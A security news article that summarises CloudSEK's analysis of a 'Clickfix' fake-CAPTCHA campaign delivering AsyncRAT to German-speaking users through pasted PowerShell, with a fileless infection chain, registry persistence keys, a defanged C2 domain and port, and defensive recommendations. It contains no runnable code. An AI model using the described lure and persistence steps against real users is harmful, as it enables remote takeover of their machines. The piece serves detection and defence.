In a recent investigation, threat intelligence firm CloudSEK uncovered a stealthy, fileless malware campaign leveraging social engineering and native system tools to deliver AsyncRAT, a remote access trojan. Branded as a “Clickfix” attack, the campaign is designed to lure German-speaking users into self-executing an obfuscated PowerShell payload — all without dropping a single file to disk.
“The malware is delivered via a fake verification prompt that lures users into executing a malicious command,” CloudSEK notes.
The campaign starts with a webpage mimicking a CAPTCHA verification screen. When users click “I’m not a robot,” a PowerShell command is copied to their clipboard. They are then instructed to paste and execute this in their terminal under the guise of verifying their identity. This localized text suggests with high confidence that “the campaign is targeted towards German speaking users”, according to CloudSEK’s attribution efforts.
Once executed, the PowerShell payload triggers a multi-stage infection chain:
- Step 1: Uses conhost.exe to invoke PowerShell in headless mode.
- Step 2: Downloads an obfuscated payload from namoet[.]de:80/x.
- Step 3: Decodes and executes the payload entirely in memory using PowerShell’s Add-Type feature.
“The malware establishes persistence through registry keys and connects to a remote TCP C2 server on port 4444,” the report confirms.
This fileless approach not only reduces forensic artifacts but also enables deep system access. The decrypted payload compiles and loads C# code in memory, establishing a reverse TCP shell to namoet[.]de:4444, giving the attacker full control over the victim’s machine.
The threat actors employ a clever technique: they reverse base64-encoded C# code, compile it using PowerShell, and invoke it using a static method. One example:
This approach matches AsyncRAT’s known TTPs:
- T1059.001: PowerShell Execution
- T1127.001: In-memory Compilation After Delivery
- T1547.001: Registry Persistence using HKCU:\RunOnce
- T1071.001 / T1571: Application Layer Protocol with Non-Standard Ports (TCP 4444)
“The payload includes typical byte[] handling, process injection, and embedded base64 C# in a reversed format,” which directly aligns with AsyncRAT staging behaviors.
The malware ensures re-execution at next logon by adding registry keys under:
- HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
- HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
Additionally, CloudSEK observed the following evasion techniques:
- No files written to disk
- Anti-debugging via obfuscated commands
- Disabling Windows Defender
- Using LOLBins like conhost.exe and powershell.exe
Given its sophistication and stealth, the Clickfix AsyncRAT campaign requires a multi-layered defense strategy:
- Block suspicious PowerShell execution, especially headless or hidden instances.
- Monitor registry modifications, particularly in Run and RunOnce keys.
- Implement memory scanning tools to detect in-memory C# compilation and obfuscated payloads.
- Use threat intelligence feeds to block known IOCs like
namoet[.]deand port4444.
